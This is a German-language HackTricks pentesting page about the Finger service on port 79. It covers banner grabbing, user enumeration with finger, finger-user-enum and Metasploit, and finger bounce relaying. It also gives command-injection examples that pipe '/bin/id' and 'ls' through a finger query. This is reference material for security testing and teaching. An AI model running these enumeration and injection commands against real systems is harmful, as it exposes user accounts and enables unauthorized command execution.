hacktricks/network-services-pentesting/pentesting-finger.md
2024-02-10 15:36:32 +00:00

5.8 KiB

79 - Pentesting Finger

Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Grundlegende Informationen

Das Programm/Der Dienst Finger wird verwendet, um Informationen über Computerbenutzer abzurufen. In der Regel umfasst die bereitgestellte Information den Benutzernamen, den vollständigen Namen und in einigen Fällen zusätzliche Details. Diese zusätzlichen Details könnten den Bürostandort und die Telefonnummer (falls verfügbar), die Zeit, zu der sich der Benutzer angemeldet hat, die Inaktivitätszeit (Idle-Zeit), den letzten Zeitpunkt, an dem der Benutzer E-Mails gelesen hat, und den Inhalt der Plan- und Projektdateien des Benutzers umfassen.

Standardport: 79

PORT   STATE SERVICE
79/tcp open  finger

Enumeration

Banner Grabbing/Grundlegende Verbindung

Banner Grabbing ist eine Technik, bei der versucht wird, Informationen über einen Dienst zu erhalten, indem die Banners oder Header-Nachrichten analysiert werden, die der Dienst bei der Verbindung an den Client sendet. Dies kann verwendet werden, um Informationen wie den Diensttyp, die Version, den Betriebssystemtyp und andere Details zu identifizieren.

Die grundlegende Verbindungsmethode für Banner Grabbing besteht darin, eine Verbindung zum Dienst herzustellen und die empfangene Banner-Nachricht zu analysieren. Dies kann mit Tools wie Telnet oder Netcat durchgeführt werden.

Ein Beispiel für die Verwendung von Telnet zum Banner Grabbing ist:

telnet <ziel-ip> <ziel-port>

Nachdem die Verbindung hergestellt wurde, wird der Banner oder die Header-Nachricht angezeigt, die Informationen über den Dienst enthält.

Eine andere Methode für das Banner Grabbing ist die Verwendung von Tools wie Nmap oder Bannergrab. Diese Tools automatisieren den Prozess des Banner Grabbing und können Informationen über mehrere Dienste gleichzeitig sammeln.

Es ist wichtig zu beachten, dass das Banner Grabbing eine passive Technik ist und normalerweise keine Sicherheitsbedenken verursacht. Es ist jedoch wichtig, diese Technik mit Vorsicht anzuwenden und die geltenden Gesetze und Richtlinien einzuhalten.

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

Benutzeraufzählung

User enumeration is the process of gathering information about valid user accounts on a target system. This information can be used by an attacker to gain unauthorized access to the system.

Benutzeraufzählung ist der Prozess, bei dem Informationen über gültige Benutzerkonten auf einem Zielsystem gesammelt werden. Diese Informationen können von einem Angreifer verwendet werden, um unbefugten Zugriff auf das System zu erlangen.

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

Alternativ können Sie finger-user-enum von pentestmonkey verwenden, hier einige Beispiele:

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap führt ein Skript aus, um die Standard-Skripte zu verwenden

Metasploit verwendet mehr Tricks als Nmap

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

Befehlsausführung

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

Verwenden Sie ein System als Finger-Relais

finger user@host@victim
finger @internal@external
Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen: